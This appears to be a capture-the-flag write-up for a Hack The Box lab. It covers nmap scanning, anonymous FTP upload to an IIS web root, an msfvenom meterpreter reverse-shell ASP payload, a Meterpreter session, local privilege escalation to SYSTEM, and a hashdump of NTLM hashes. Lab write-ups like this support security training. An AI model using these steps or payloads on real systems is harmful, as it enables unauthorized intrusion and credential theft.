# Meta Data

 IP: 10.129.171.162

 Date accessed: 08/11/2021


# NMAP 

```

nmap -T4 -A -p- 10.129.171.162

```

```
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-11 14:30 EDT
Nmap scan report for 10.129.171.162
Host is up (0.13s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   129.51 ms 10.10.14.1
2   129.47 ms 10.129.171.162

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.69 seconds

```

## info disclosure
- server header reveals version and OS
- title reveals default website
```
http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

```
- ftp open with anon login `Anonymous FTP login allowed (FTP code 230)`


# Enumeration

- navigating to the website is indeed default
- this web server can be exposed  > poor hygiene


## Dir buster

- look for medium list with asm, asmx, asp, aspx, txt, zip, bak extensions let it run 


## Welcome.png 
we can change this to another photo

- login as `anonymous:anonymous`

```
ftp 10.129.171.162
Connected to 10.129.171.162.
220 Microsoft FTP Service
Name (10.129.171.162:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> 


```

- putting another photo on the server

```
ftp 10.129.171.162
Connected to 10.129.171.162.
220 Microsoft FTP Service
Name (10.129.171.162:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> 


```
- navigate to `http://10.129.171.162/cat.jpeg` > saw m y cat photo

this is importatnt because I can put things into this folder and it's vulnerable I was able to execute the file
I can put reverse shell on here since it;s executable 

# Msf Venom 

I'm gonna use a meterpreter payload

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

```
- put the aspx file on the server
- put a listener on mssfconsole 
- navigate to the shell file on the website
- got a shell 

```

[*] Started reverse TCP handler on 10.10.14.121:4444 
[*] Sending stage (175174 bytes) to 10.129.171.162
[*] Meterpreter session 1 opened (10.10.14.121:4444 -> 10.129.171.162:49158) at 2021-08-11 15:02:01 -0400

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > 



```

- we're not system, therefore we can't dump hash

# Post exploiation enum
```
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(multi/handler) > use 1
[-] Invalid module index: 1
msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.129.171.162 - Collecting local exploits for x86/windows...
[*] 10.129.171.162 - 38 exploit checks are being tried...
[+] 10.129.171.162 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[-] 10.129.171.162 - Post failed: NoMethodError undefined method `reverse!' for nil:NilClass
[-] 10.129.171.162 - Call stack:
[-] 10.129.171.162 -   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32'
[-] 10.129.171.162 -   /usr/share/metasploit-framework/lib/msf/core/session/provider/single_command_shell.rb:84:in `shell_command_token'
[-] 10.129.171.162 -   /usr/share/metasploit-framework/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb:96:in `check'
[-] 10.129.171.162 -   /usr/share/metasploit-framework/modules/post/multi/recon/local_exploit_suggester.rb:121:in `block in run'
[-] 10.129.171.162 -   /usr/share/metasploit-framework/modules/post/multi/recon/local_exploit_suggester.rb:119:in `each'
[-] 10.129.171.162 -   /usr/share/metasploit-framework/modules/post/multi/recon/local_exploit_suggester.rb:119:in `run'
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > 



```

- let's use ketrapod- got in


```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 


```

```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a450f6000be7df50ee304d0a838d638f:::
babis:1000:aad3b435b51404eeaad3b435b51404ee:a1133ec0f7779e215acc8a36922acf57:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::


```

get flags in desktop dir